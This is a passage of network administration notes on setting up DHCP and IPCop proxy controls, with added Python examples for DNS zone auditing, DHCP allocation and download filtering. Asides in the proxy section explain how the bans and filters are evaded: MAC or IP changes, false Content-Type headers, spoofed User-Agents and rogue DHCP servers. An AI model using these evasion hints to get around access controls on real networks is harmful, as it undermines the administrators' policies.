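The forward zone (A records) and reverse zone (PTR records) built above are maintained separately, and they drift apart: hosts get renamed, PTRs are forgotten. Mail servers, log correlation and some access checks rely on the two agreeing (forward-confirmed reverse DNS), so it is worth checking. The following is an added example for these notes, not code from the page: it builds the zone names the wizard creates, resolves against small in-memory copies of the two zones, and audits them. Only server1 and its address come from the notes; the other hosts are constructed, including one stale PTR and one missing PTR.

```python
"""Check that the forward (iic.edu.kh) and reverse (21.168.192.in-addr.arpa) zones agree."""
import ipaddress


def ptr_name(ip):
    """192.168.21.254 -> '254.21.168.192.in-addr.arpa.' (the PTR owner name)."""
    return ipaddress.ip_address(ip).reverse_pointer + "."


def reverse_zone_name(network):
    """Zone name the New Zone wizard creates for Network ID 192.168.21: '21.168.192.in-addr.arpa.'."""
    net = ipaddress.ip_network(network)
    octets = str(net.network_address).split(".")[: net.prefixlen // 8]
    return ".".join(reversed(octets)) + ".in-addr.arpa."


# Constructed zone data for this example (only server1 is taken from the notes).
FORWARD = {                           # A records: name -> IP
    "server1.iic.edu.kh.": "192.168.21.254",
    "www.iic.edu.kh.": "192.168.21.10",
    "mail.iic.edu.kh.": "192.168.21.20",
    "print.iic.edu.kh.": "192.168.21.30",
}
REVERSE = {                           # PTR records: owner name -> host name
    ptr_name("192.168.21.254"): "server1.iic.edu.kh.",
    ptr_name("192.168.21.10"): "www.iic.edu.kh.",
    ptr_name("192.168.21.20"): "oldmail.iic.edu.kh.",   # stale: the host was renamed
    # print.iic.edu.kh has no PTR at all
}


def lookup_a(name, forward=FORWARD):
    return forward.get(name if name.endswith(".") else name + ".")


def lookup_ptr(ip, reverse=REVERSE):
    return reverse.get(ptr_name(ip))


def fcrdns(ip, forward=FORWARD, reverse=REVERSE):
    """Forward-confirmed reverse DNS: the PTR name must have an A record pointing back to ip."""
    name = lookup_ptr(ip, reverse)
    return name is not None and lookup_a(name, forward) == str(ipaddress.ip_address(ip))


def audit(forward=FORWARD, reverse=REVERSE):
    """Return a sorted list of the problems an admin should fix in the two zones."""
    problems = []
    for name, ip in forward.items():
        ptr = lookup_ptr(ip, reverse)
        if ptr is None:
            problems.append(f"missing PTR for {ip} ({name})")
        elif ptr != name:
            problems.append(f"PTR for {ip} says {ptr}, A record says {name}")
    for owner, name in reverse.items():
        if lookup_a(name, forward) is None:
            problems.append(f"PTR {owner} -> {name} but {name} has no A record")
    return sorted(problems)


if __name__ == "__main__":
    print(reverse_zone_name("192.168.21.0/24"))
    for ip in ("192.168.21.254", "192.168.21.20", "192.168.20.7"):
        print(ip, "fcrdns:", fcrdns(ip))
    for problem in audit():
        print("-", problem)
```

The same audit can be run against a real server by replacing the two dictionaries with the output of a zone transfer or of "dnscmd /zoneprint" for each zone; the logic does not change.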

Build DHCP Server (DHCP: Dynamic Host Configuration Protocol)

Automatically gives a dynamic IP configuration to the client's network card:
(IP address, subnet mask, default gateway, DNS ...)
----------------------------------------------------
What is DHCP?

=> There are two sides to DHCP:
a. DHCP server: holds the pool of free IP addresses
b. DHCP client: takes an IP address from the DHCP server

=> There are 4 steps between DHCP client and DHCP server (DORA):
a. IP lease Discover : the client broadcasts a request for a free IP address
b. IP lease Offer : the DHCP server picks a free address from its pool
   and offers it to the client
c. IP lease Request : the client asks for the offered address (if several servers
   answered, it takes the first offer it received)
d. IP lease Acknowledgment: the DHCP server confirms the lease to the client
(DHCP has no authentication: any box on the LAN can answer a Discover, so a rogue
DHCP server can hand out its own gateway and DNS; the AD "Authorize" step below only
stops unauthorized Windows DHCP servers that are domain members)

----------------------------------------------------

1. Add the DHCP component:

=> Start - Programs - Administrative Tools - Manage Your Server:
-Manage Your Server Roles - Add or remove a role
-Next - DHCP server - Next (3) - Cancel - Finish.
(follow the screens)

2. Create a new scope and set the scope options (router & DNS IP):

=> Start - Programs - Administrative Tools - DHCP - right-click (host name)
- New Scope - Next - Name: "DHCP for Office Admin, for ..... "
- Description: IIC University - Next:
.Start IP address: xxx.xxx.xxx.xxx (192.168.168.1)
.End IP address: xxx.xxx.xxx.xxx   (192.168.168.254)
.Length: 24
.Subnet mask: automatic (255.255.255.0)

-Add: exclusion ranges (addresses inside the scope that the server must never hand out)

1. For leaders & the IT office
.Start IP address: xxx.xxx.xxx.xxx (192.168.168.1)
.End IP address: xxx.xxx.xxx.xxx   (192.168.168.20)

2. For servers
.Start IP address: xxx.xxx.xxx.xxx (192.168.168.161)
.End IP address: xxx.xxx.xxx.xxx   (192.168.168.170)

3. For printers & reserve ...
.Start IP address: xxx.xxx.xxx.xxx (192.168.168.200)
.End IP address: xxx.xxx.xxx.xxx   (192.168.168.254)


-Next: (lease duration) - Next (2) - Router (default gateway)

(192.168.1.1).
(the gateway must be on the clients' own subnet; with a 192.168.168.0/24 scope that is the
192.168.168.x address of the router, not 192.168.1.1)

A. Domain name and DNS servers:
-Parent domain : "vithya.local"
-Server name : "server1"
-IP address : "192.168.168.168" - Add (Resolve)
-IP address : "203.217.168.27" (ISP)
(better to give clients only the internal DNS server and let it forward to the ISP: a client
that queries the ISP resolver directly cannot resolve vithya.local and bypasses any DNS-based
filtering)


-Next

B. WINS servers:
-Server name : "server1"
-IP address : "192.168.168.168" - Add (Resolve)

-Next (2) - Finish.
=> Right-click (server1.vithya.local [192.168.168.168]) - Authorize

3. DHCP reservations: a fixed IP address tied to one MAC address, so a server or printer
   always gets the same address from DHCP.
=> Right-click (Reservations) - New Reservation
. Reservation name : xxxx (DomainServer01)
. IP address : (192.168.168.168)
. MAC address : (000000000000) (the real MAC of the client's network card, from ipconfig /all)
- DHCP only - Add.

4. Testing the DHCP server on a user computer:
-Log on to the user computer - change TCP/IP to "Obtain an IP address automatically"
-Start => Run - cmd => C:\>ipconfig /all

=> To see whether it obtained an IP from the server or not
=> If not, try the commands: C:\>ipconfig /release and C:\>ipconfig /renew
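How the scope, exclusion ranges and reservation above combine to decide which address a client gets, as an added example for these notes (not code from the page or from the Windows DHCP service): a small model of the server side of the DORA exchange. The scope, exclusions and reserved address are the ones configured above; the client MAC addresses are constructed. The model assumes a reservation wins even when its address lies inside an exclusion range (the notes reserve .168, which sits in the 161-170 exclusion).

```python
"""DHCP scope allocation (DORA) with the exclusions and reservation from the notes."""
import ipaddress


class Scope:
    def __init__(self, start, end, exclusions=(), reservations=None):
        self.start, self.end = ipaddress.ip_address(start), ipaddress.ip_address(end)
        self.exclusions = [(ipaddress.ip_address(a), ipaddress.ip_address(b))
                           for a, b in exclusions]
        # Reservation: MAC -> fixed address. Assumed here to win even inside an
        # exclusion range (the notes reserve .168 inside the 161-170 exclusion).
        self.reservations = {m.lower(): ipaddress.ip_address(ip)
                             for m, ip in (reservations or {}).items()}
        self.leases = {}                       # MAC -> address currently leased

    def _excluded(self, ip):
        return any(lo <= ip <= hi for lo, hi in self.exclusions)

    def offer(self, mac):
        """DISCOVER -> OFFER. Returns the address the server would offer, or None."""
        mac = mac.lower()
        if mac in self.reservations:
            return self.reservations[mac]
        if mac in self.leases:                 # a renewing client keeps its address
            return self.leases[mac]
        taken = set(self.leases.values()) | set(self.reservations.values())
        ip = self.start
        while ip <= self.end:
            if not self._excluded(ip) and ip not in taken:
                return ip
            ip += 1
        return None                            # pool exhausted

    def request(self, mac, requested):
        """REQUEST -> ACK (True) or NAK (False): the client only gets what it was offered."""
        mac = mac.lower()
        if ipaddress.ip_address(requested) != self.offer(mac):
            return False
        self.leases[mac] = ipaddress.ip_address(requested)
        return True

    def release(self, mac):
        self.leases.pop(mac.lower(), None)


def dora(scope, mac):
    """Full Discover/Offer/Request/Ack exchange for one client; returns the leased address."""
    offered = scope.offer(mac)
    if offered is None or not scope.request(mac, offered):
        return None
    return str(offered)


def office_scope():
    """The scope from the notes: 192.168.168.1-254, three exclusion ranges, one reservation."""
    return Scope("192.168.168.1", "192.168.168.254",
                 exclusions=[("192.168.168.1", "192.168.168.20"),
                             ("192.168.168.161", "192.168.168.170"),
                             ("192.168.168.200", "192.168.168.254")],
                 reservations={"00:1A:2B:3C:4D:5E": "192.168.168.168"})  # MAC is constructed


if __name__ == "__main__":
    s = office_scope()
    print(dora(s, "aa:bb:cc:00:00:01"))       # first free address after the exclusion: .21
    print(dora(s, "00:1a:2b:3c:4d:5e"))       # the reserved server address: .168
    print(s.request("aa:bb:cc:00:00:02", "192.168.168.5"))   # excluded address -> NAK
```

The last line is the point of the exclusions: a client that asks for an address it was not offered gets a NAK, and nothing in the first three ranges is ever leased dynamically. What the model cannot do is stop a second server on the same LAN from answering the Discover first; that is why the earlier note on rogue DHCP servers matters.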









IPCop (Advanced Proxy):

----------------------------------------------
1. Enable the web proxy log to monitor users

=> Click menu Services - Advanced Proxy - tick "Enabled on Green",
"Transparent on Green" and "Log enabled" => Save and Restart

=> Test: open a website: yahoo.com, google.com
=> To see who is opening which website => click menu Logs
            => Proxy Logs in the IPCop web interface
(transparent mode only catches port 80; HTTPS is not proxied, so it is neither
logged nor filtered by the rules below)
----------------------------------------------

2. Ban IP and MAC addresses

=> Click menu Services - Advanced Proxy - in the box "Banned IP addresses (one per line)"
-type the IP of the user computer you want to block, or in the box
"Banned MAC addresses (one per line)" (e.g. 00:24:8C:E9:97:A6) => type the MAC of the user
computer you want to block => Save and Restart

=> Test: give a client the IP or MAC address from the rule => try to open a website ....
**** Note: to exempt yourself from the rule, add your IP in the box
"Unrestricted IP addresses (one per line)" or "Unrestricted MAC addresses (one per line)"
(both bans are by address only; a user who changes the PC's IP or MAC is no longer matched,
and the same trick gets a user onto the unrestricted list)
---------------------------------------------
3. Block MIME content types
http://www.utoronto.ca/web/htmldocs/book/book-3ed/appb/mimetype.html#arch
=> Click menu Services - Advanced Proxy => at "MIME type filter" => tick "Enabled"
-Type the content types you want to block, e.g.:
            .application/octet-stream (*.exe)
            .application/zip
            .application/x-tar
            .application/rar

(google "MIME content type")
Save and Restart
=> Test: download software...
(the filter trusts the Content-Type header the remote web server sends; a server that
labels an .exe as text/plain gets through)
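The ISA extension block (section 3 of the ISA notes) and the IPCop MIME filter above both decide on what the download is *called*: the URL's extension, or the Content-Type label the remote server chose to send. The following added example (written for these notes; not IPCop, ISA or Squid code) puts the two checks next to a third one that looks at the first bytes of the body, and runs all three over four constructed responses. The file signatures are the public ones for PE, zip, rar, gzip, Flash and FLV; the sample URLs and bytes are made up.

```python
"""Three ways a proxy can answer 'is this a program download?': URL extension (ISA HTTP
filter), Content-Type header (IPCop MIME filter), and the first bytes of the body."""
from urllib.parse import urlsplit

BLOCKED_EXTENSIONS = frozenset(
    "exe bat com dll ocx cab rar zip tar pif js vbs flv swf".split())
BLOCKED_MIME = frozenset(["application/octet-stream", "application/zip",
                          "application/x-tar", "application/rar"])
# File signatures ("magic numbers") at the start of the body.
MAGIC = [
    (b"MZ", "application/x-msdownload"),            # PE: exe, dll, ocx, scr ...
    (b"PK\x03\x04", "application/zip"),              # zip (also docx, jar, apk)
    (b"Rar!\x1a\x07", "application/x-rar-compressed"),
    (b"\x1f\x8b", "application/gzip"),
    (b"FWS", "application/x-shockwave-flash"),
    (b"CWS", "application/x-shockwave-flash"),
    (b"FLV", "video/x-flv"),
]


def url_extension(url):
    """Extension of the last path segment, ignoring the query ('/x/setup.exe?a=1' -> 'exe')."""
    last = urlsplit(url).path.rsplit("/", 1)[-1]
    return last.rsplit(".", 1)[-1].lower() if "." in last else ""


def ext_blocked(url):
    """What ISA's Extensions tab does: a name check on the request URL."""
    return url_extension(url) in BLOCKED_EXTENSIONS


def mime_blocked(content_type):
    """What the IPCop MIME filter does: trusts the header the remote server sent."""
    return content_type.split(";", 1)[0].strip().lower() in BLOCKED_MIME


def sniff(body):
    """Content check: the format the bytes actually are, whatever the name or header says."""
    for magic, mime in MAGIC:
        if body.startswith(magic):
            return mime
    return None


def classify(url, content_type, body):
    """Result of each check; the overall verdict blocks if any of the three fires."""
    result = {"ext": ext_blocked(url), "mime": mime_blocked(content_type),
              "sniffed": sniff(body)}
    result["verdict"] = "block" if (result["ext"] or result["mime"]
                                    or result["sniffed"]) else "allow"
    return result


# Constructed sample responses (URL, Content-Type header, first bytes of the body).
SAMPLES = {
    "plain":   ("http://dl.example/setup.exe", "application/octet-stream", b"MZ\x90\x00\x03"),
    "renamed": ("http://dl.example/setup.ex_", "text/plain", b"MZ\x90\x00\x03"),
    "script":  ("http://dl.example/get.php?id=7", "application/pdf", b"PK\x03\x04\x14\x00"),
    "pdf":     ("http://dl.example/report.pdf", "application/pdf", b"%PDF-1.4\n"),
}

if __name__ == "__main__":
    for label, sample in SAMPLES.items():
        print(f"{label:8}", classify(*sample))
```

Only the "plain" sample trips the two name-based checks; the renamed executable and the zip served from a script with a false PDF header pass both and are caught only by the bytes. The byte check has its own limits (a zip inside a zip, a password-protected archive, anything over HTTPS), which is why download filtering on a proxy is a speed bump rather than a control.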
------------------------------------------
4. Block or unblock outbound ports
=> Click menu Services => Advanced Proxy => in the box "Allowed standard ports (one per line)"
-To block port 80 => remove "80 #http" => no website can be opened through the proxy
-To allow port 80 => add "80 #http" => users can open websites again
---------------------------------------------
5. Limit download sizes
=> Click menu Services => Advanced Proxy => in the box "Max download size (KB)" => set 2000000
(the field is in KB, so about 2000 MB) and in the box "Max upload size (KB)" => set 1000000 (about 1000 MB)
*** Note: to exempt yourself from the limit above (unlimited download), add
your IP in the box "Unrestricted IP addresses (one per line)" or "Unrestricted MAC addresses (one per line)"
---------------------------------------------
6. Limit Internet bandwidth
=> Click menu Services => Traffic Shaping => tick "Traffic Shaping" => Downlink speed (kbit/sec) = 256
and Uplink speed (kbit/sec) = 128 => users can download at only 256 kbit/s
and upload at only 128 kbit/s.
---------------------------------------------
7. Allow only Firefox and IE users
=> Click menu Services => Advanced Proxy => tick "Enable browser check" => tick "Firefox" and "IE"
=> only Firefox and IE users can browse websites, other browsers cannot.
(the check reads the User-Agent header, which any client can set to any value)
---------------------------------------------
8. Block the website Facebook
=> Click menu Services => URL Filter => in the box "Blocked domains (one per line)" => type the website:
facebook.com => tick "Enable custom blacklist" => Save and Restart
=> Test: open facebook.com